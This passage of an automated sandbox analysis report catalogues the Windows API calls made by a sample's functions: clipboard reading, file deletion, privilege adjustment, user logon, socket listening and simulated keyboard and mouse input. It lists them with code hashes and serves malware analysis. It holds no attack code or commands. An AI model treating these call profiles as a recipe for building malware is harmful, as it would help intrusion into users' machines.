                                                  • GetCursorPos.USER32(?), ref: 00629B68
                                                  • ScreenToClient.USER32(?,?), ref: 00629B75
                                                  • GetParent.USER32(?), ref: 00629B93
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00629BFA
                                                  • SendMessageW.USER32 ref: 00629C2B
                                                  • ClientToScreen.USER32(?,?), ref: 00629C84
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00629CB4
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00629CDE
                                                  • SendMessageW.USER32 ref: 00629D01
                                                  • ClientToScreen.USER32(?,?), ref: 00629D4E
                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00629D82
                                                    • Part of subcall function 005A9944: GetWindowLongW.USER32(?,000000EB), ref: 005A9952
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00629E05
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                  • String ID: @GUI_DRAGID$F$p#f
                                                  • API String ID: 3429851547-1339572704
                                                  • Opcode ID: a72cfa5cbce04797a872c1287f8449665f55c34206dc9212608d8b3d6316443d
                                                  • Instruction ID: e005edf0d1024815dc41eb4ed046e697c486ca00f58a9b45663bcb43ad56cb50
                                                  • Opcode Fuzzy Hash: a72cfa5cbce04797a872c1287f8449665f55c34206dc9212608d8b3d6316443d
                                                  • Instruction Fuzzy Hash: CF428E34604A11AFEB24CF24DC44EAABBE6FF8A320F144619F699873A1D771D851CF61
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 006248F3
                                                  • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00624908
                                                  • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00624927
                                                  • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0062494B
                                                  • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0062495C
                                                  • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0062497B
                                                  • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 006249AE
                                                  • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 006249D4
                                                  • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00624A0F
                                                  • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00624A56
                                                  • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00624A7E
                                                  • IsMenu.USER32(?), ref: 00624A97
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00624AF2
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00624B20
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00624B94
                                                  • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00624BE3
                                                  • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00624C82
                                                  • wsprintfW.USER32 ref: 00624CAE
                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00624CC9
                                                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 00624CF1
                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00624D13
                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00624D33
                                                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 00624D5A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                  • String ID: %d/%02d/%02d
                                                  • API String ID: 4054740463-328681919
                                                  • Opcode ID: e119281c4b11cafc1562a1f078f4b3d71c06cd6c11fa22c7d71fc3480558cd2a
                                                  • Instruction ID: 4c8f9ca53a798b07b79f2ed4195dbcf1fda714f0abdc2bfeaecefbac6d067269
                                                  • Opcode Fuzzy Hash: e119281c4b11cafc1562a1f078f4b3d71c06cd6c11fa22c7d71fc3480558cd2a
                                                  • Instruction Fuzzy Hash: 6D12E071600A25ABEB248F28EC49FEE7BFAEF85710F104119F915EA2E1DB749941CF50
                                                  APIs
                                                  • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 005AF998
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005EF474
                                                  • IsIconic.USER32(00000000), ref: 005EF47D
                                                  • ShowWindow.USER32(00000000,00000009), ref: 005EF48A
                                                  • SetForegroundWindow.USER32(00000000), ref: 005EF494
                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 005EF4AA
                                                  • GetCurrentThreadId.KERNEL32 ref: 005EF4B1
                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 005EF4BD
                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 005EF4CE
                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 005EF4D6
                                                  • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 005EF4DE
                                                  • SetForegroundWindow.USER32(00000000), ref: 005EF4E1
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 005EF4F6
                                                  • keybd_event.USER32(00000012,00000000), ref: 005EF501
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 005EF50B
                                                  • keybd_event.USER32(00000012,00000000), ref: 005EF510
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 005EF519
                                                  • keybd_event.USER32(00000012,00000000), ref: 005EF51E
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 005EF528
                                                  • keybd_event.USER32(00000012,00000000), ref: 005EF52D
                                                  • SetForegroundWindow.USER32(00000000), ref: 005EF530
                                                  • AttachThreadInput.USER32(?,000000FF,00000000), ref: 005EF557
                                                  Strings
                                                  Similarity
                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 4125248594-2988720461
                                                  • Opcode ID: fd5ba2bebea762c3f4d86456a47c59d7b8ff65e5b97313f00ad1f60def4840e9
                                                  • Instruction ID: 7e176e686932df340bd1b0cf30c3372f2c7836312f5c479ce812cc13b8b40cdc
                                                  • Opcode Fuzzy Hash: fd5ba2bebea762c3f4d86456a47c59d7b8ff65e5b97313f00ad1f60def4840e9
                                                  • Instruction Fuzzy Hash: 9C318771A402187BEB306BB65C49FBF7E6DFB44B60F101026F601F61D1CAB09D11ABA0
                                                  APIs
                                                    • Part of subcall function 005F16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005F170D
                                                    • Part of subcall function 005F16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005F173A
                                                    • Part of subcall function 005F16C3: GetLastError.KERNEL32 ref: 005F174A
                                                  • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 005F1286
                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 005F12A8
                                                  • CloseHandle.KERNEL32(?), ref: 005F12B9
                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 005F12D1
                                                  • GetProcessWindowStation.USER32 ref: 005F12EA
                                                  • SetProcessWindowStation.USER32(00000000), ref: 005F12F4
                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 005F1310
                                                    • Part of subcall function 005F10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005F11FC), ref: 005F10D4
                                                    • Part of subcall function 005F10BF: CloseHandle.KERNEL32(?,?,005F11FC), ref: 005F10E9
                                                  Strings
                                                  Similarity
                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                  • String ID: $default$winsta0$Ze
                                                  • API String ID: 22674027-3457319499
                                                  • Opcode ID: abee890258dcb9259444fad2586cac4d783d72bb70d576580659cc1ab17244b1
                                                  • Instruction ID: 9d7326887cd4508c96e3c74a2769f4a01b3a729e8f34c469a8e79adb17ca7059
                                                  • Opcode Fuzzy Hash: abee890258dcb9259444fad2586cac4d783d72bb70d576580659cc1ab17244b1
                                                  • Instruction Fuzzy Hash: 00818671900A09EBDF249FA4DC49BFE7FBABF84710F144129FA11A61A0D7398945CB68
                                                  APIs
                                                    • Part of subcall function 005F10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 005F1114
                                                    • Part of subcall function 005F10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F1120
                                                    • Part of subcall function 005F10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F112F
                                                    • Part of subcall function 005F10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F1136
                                                    • Part of subcall function 005F10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 005F114D
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 005F0BCC
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 005F0C00
                                                  • GetLengthSid.ADVAPI32(?), ref: 005F0C17
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 005F0C51
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005F0C6D
                                                  • GetLengthSid.ADVAPI32(?), ref: 005F0C84
                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 005F0C8C
                                                  • HeapAlloc.KERNEL32(00000000), ref: 005F0C93
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 005F0CB4
                                                  • CopySid.ADVAPI32(00000000), ref: 005F0CBB
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 005F0CEA
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 005F0D0C
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 005F0D1E
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F0D45
                                                  • HeapFree.KERNEL32(00000000), ref: 005F0D4C
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F0D55
                                                  • HeapFree.KERNEL32(00000000), ref: 005F0D5C
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F0D65
                                                  • HeapFree.KERNEL32(00000000), ref: 005F0D6C
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 005F0D78
                                                  • HeapFree.KERNEL32(00000000), ref: 005F0D7F
                                                    • Part of subcall function 005F1193: GetProcessHeap.KERNEL32(00000008,005F0BB1,?,00000000,?,005F0BB1,?), ref: 005F11A1
                                                    • Part of subcall function 005F1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,005F0BB1,?), ref: 005F11A8
                                                    • Part of subcall function 005F1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,005F0BB1,?), ref: 005F11B7
                                                  Similarity
                                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                  • String ID:
                                                  • API String ID: 4175595110-0
                                                  • Opcode ID: a23879df0e7f541eb6dbe8f335cd6de73215ae5071fe3524f19e587788298041
                                                  • Instruction ID: eb1c66c1da03a7ceaa74505678a2e59882d807285b4fa9b7bcde51980f4b9b74
                                                  • Opcode Fuzzy Hash: a23879df0e7f541eb6dbe8f335cd6de73215ae5071fe3524f19e587788298041
                                                  • Instruction Fuzzy Hash: F3716B7290020AABDF20DFA4DC49FBEBBBDBF04310F085515EA14E7192D775A906CBA0
                                                  APIs
                                                  • OpenClipboard.USER32(0062CC08), ref: 0060EB29
                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0060EB37
                                                  • GetClipboardData.USER32(0000000D), ref: 0060EB43
                                                  • CloseClipboard.USER32 ref: 0060EB4F
                                                  • GlobalLock.KERNEL32(00000000), ref: 0060EB87
                                                  • CloseClipboard.USER32 ref: 0060EB91
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0060EBBC
                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0060EBC9
                                                  • GetClipboardData.USER32(00000001), ref: 0060EBD1
                                                  • GlobalLock.KERNEL32(00000000), ref: 0060EBE2
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0060EC22
                                                  • IsClipboardFormatAvailable.USER32(0000000F), ref: 0060EC38
                                                  • GetClipboardData.USER32(0000000F), ref: 0060EC44
                                                  • GlobalLock.KERNEL32(00000000), ref: 0060EC55
                                                  • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0060EC77
                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0060EC94
                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0060ECD2
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0060ECF3
                                                  • CountClipboardFormats.USER32 ref: 0060ED14
                                                  • CloseClipboard.USER32 ref: 0060ED59
                                                  Similarity
                                                  • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                  • String ID:
                                                  • API String ID: 420908878-0
                                                  • Opcode ID: e58d5f782524beeeca97ec3ed1f636aefddcb609455c10cdbc475f3ec6983096
                                                  • Instruction ID: 5a52b03ab511de4f3512a2bd327b5ba4ea709582395a641f7baa2a6bd46a25c8
                                                  • Opcode Fuzzy Hash: e58d5f782524beeeca97ec3ed1f636aefddcb609455c10cdbc475f3ec6983096
                                                  • Instruction Fuzzy Hash: FA61DE34244202AFD714EF24D898F6A7BA6FF84714F14591DF456872E1CB32ED06CBA2
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 006069BE
                                                  • FindClose.KERNEL32(00000000), ref: 00606A12
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00606A4E
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00606A75
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00606AB2
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00606ADF
                                                  Strings
                                                  Similarity
                                                  • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                  • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                  • API String ID: 3830820486-3289030164
                                                  • Opcode ID: 2b15bac0128faefd7fc495f59f6312c3ede7dee2cd848afa52026a40fcbbb9ca
                                                  • Instruction ID: 23a36d9fd439edf4489d7e9f75454ba6a6930475e9f696568a7f11964cae20c1
                                                  • Opcode Fuzzy Hash: 2b15bac0128faefd7fc495f59f6312c3ede7dee2cd848afa52026a40fcbbb9ca
                                                  • Instruction Fuzzy Hash: 9ED14E72508305AEC714EBA4C885EAFBBEDBF88704F44491DF585C7291EB74DA48CB62
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00609663
                                                  • GetFileAttributesW.KERNEL32(?), ref: 006096A1
                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 006096BB
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 006096D3
                                                  • FindClose.KERNEL32(00000000), ref: 006096DE
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 006096FA
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0060974A
                                                  • SetCurrentDirectoryW.KERNEL32(00656B7C), ref: 00609768
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00609772
                                                  • FindClose.KERNEL32(00000000), ref: 0060977F
                                                  • FindClose.KERNEL32(00000000), ref: 0060978F
                                                  Strings
                                                  Similarity
                                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                  • String ID: *.*
                                                  • API String ID: 1409584000-438819550
                                                  • Opcode ID: 522375c94ae70aadf325239d69da4b6b3e8e518cd4f803b46fc916a42fe80353
                                                  • Instruction ID: 27ed4b2cdc559d6d69a8a0cea9d01625b16a3c12ec2cd28770471eed0b4aca9b
                                                  • Opcode Fuzzy Hash: 522375c94ae70aadf325239d69da4b6b3e8e518cd4f803b46fc916a42fe80353
                                                  • Instruction Fuzzy Hash: 4831E232581619AEDF28EFB4DC09ADF77AFAF49320F104155F904E21E1EB30DA45CA60
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 006097BE
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00609819
                                                  • FindClose.KERNEL32(00000000), ref: 00609824
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00609840
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00609890
                                                  • SetCurrentDirectoryW.KERNEL32(00656B7C), ref: 006098AE
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 006098B8
                                                  • FindClose.KERNEL32(00000000), ref: 006098C5
                                                  • FindClose.KERNEL32(00000000), ref: 006098D5
                                                    • Part of subcall function 005FDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 005FDB00
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                  • String ID: *.*
                                                  • API String ID: 2640511053-438819550
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 00608257
                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00608267
                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00608273
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00608310
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00608324
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00608356
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0060838C
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00608395
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectoryTime$File$Local$System
                                                  • String ID: *.*
                                                  • API String ID: 1464919966-438819550
                                                  APIs
                                                    • Part of subcall function 00593AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00593A97,?,?,00592E7F,?,?,?,00000000), ref: 00593AC2
                                                    • Part of subcall function 005FE199: GetFileAttributesW.KERNEL32(?,005FCF95), ref: 005FE19A
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 005FD122
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 005FD1DD
                                                  • MoveFileW.KERNEL32(?,?), ref: 005FD1F0
                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 005FD20D
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 005FD237
                                                    • Part of subcall function 005FD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,005FD21C,?,?), ref: 005FD2B2
                                                  • FindClose.KERNEL32(00000000,?,?,?), ref: 005FD253
                                                  • FindClose.KERNEL32(00000000), ref: 005FD264
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                  • String ID: \*.*
                                                  • API String ID: 1946585618-1173974218
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                  • String ID:
                                                  • API String ID: 1737998785-0
                                                  APIs
                                                    • Part of subcall function 005F16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005F170D
                                                    • Part of subcall function 005F16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005F173A
                                                    • Part of subcall function 005F16C3: GetLastError.KERNEL32 ref: 005F174A
                                                  • ExitWindowsEx.USER32(?,00000000), ref: 005FE932
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                  • String ID: $ $@$SeShutdownPrivilege
                                                  • API String ID: 2234035333-3163812486
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00611276
                                                  • WSAGetLastError.WSOCK32 ref: 00611283
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 006112BA
                                                  • WSAGetLastError.WSOCK32 ref: 006112C5
                                                  • closesocket.WSOCK32(00000000), ref: 006112F4
                                                  • listen.WSOCK32(00000000,00000005), ref: 00611303
                                                  • WSAGetLastError.WSOCK32 ref: 0061130D
                                                  • closesocket.WSOCK32(00000000), ref: 0061133C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$closesocket$bindlistensocket
                                                  • String ID:
                                                  • API String ID: 540024437-0
                                                  APIs
                                                    • Part of subcall function 00593AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00593A97,?,?,00592E7F,?,?,?,00000000), ref: 00593AC2
                                                    • Part of subcall function 005FE199: GetFileAttributesW.KERNEL32(?,005FCF95), ref: 005FE19A
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 005FD420
                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 005FD470
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 005FD481
                                                  • FindClose.KERNEL32(00000000), ref: 005FD498
                                                  • FindClose.KERNEL32(00000000), ref: 005FD4A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                  • String ID: \*.*
                                                  • API String ID: 2649000838-1173974218
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 4168288129-2761157908
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 006064DC
                                                  • CoInitialize.OLE32(00000000), ref: 00606639
                                                  • CoCreateInstance.OLE32(0062FCF8,00000000,00000001,0062FB68,?), ref: 00606650
                                                  • CoUninitialize.OLE32 ref: 006068D4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                  • String ID: .lnk
                                                  • API String ID: 886957087-24824748
                                                  APIs
                                                  • GetForegroundWindow.USER32(?,?,00000000), ref: 006122E8
                                                    • Part of subcall function 0060E4EC: GetWindowRect.USER32(?,?), ref: 0060E504
                                                  • GetDesktopWindow.USER32 ref: 00612312
                                                  • GetWindowRect.USER32(00000000), ref: 00612319
                                                  • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00612355
                                                  • GetCursorPos.USER32(?), ref: 00612381
                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006123DF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                  • String ID:
                                                  • API String ID: 2387181109-0
                                                  APIs
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00609B78
                                                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00609C8B
                                                    • Part of subcall function 00603874: GetInputState.USER32 ref: 006038CB
                                                    • Part of subcall function 00603874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00603966
                                                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00609BA8
                                                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00609C75
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                  • String ID: *.*
                                                  • API String ID: 1972594611-438819550
                                                  • Opcode ID: df8a2a17edd515b508af13b277b7f5280302c9c056ace2bbb774a99d782d9f99
                                                  • Instruction ID: 0f2787616b7eb8970caad18489c4867f0ce3bbb276bebfb0b361c7cf9cba0f3f
                                                  • Opcode Fuzzy Hash: df8a2a17edd515b508af13b277b7f5280302c9c056ace2bbb774a99d782d9f99
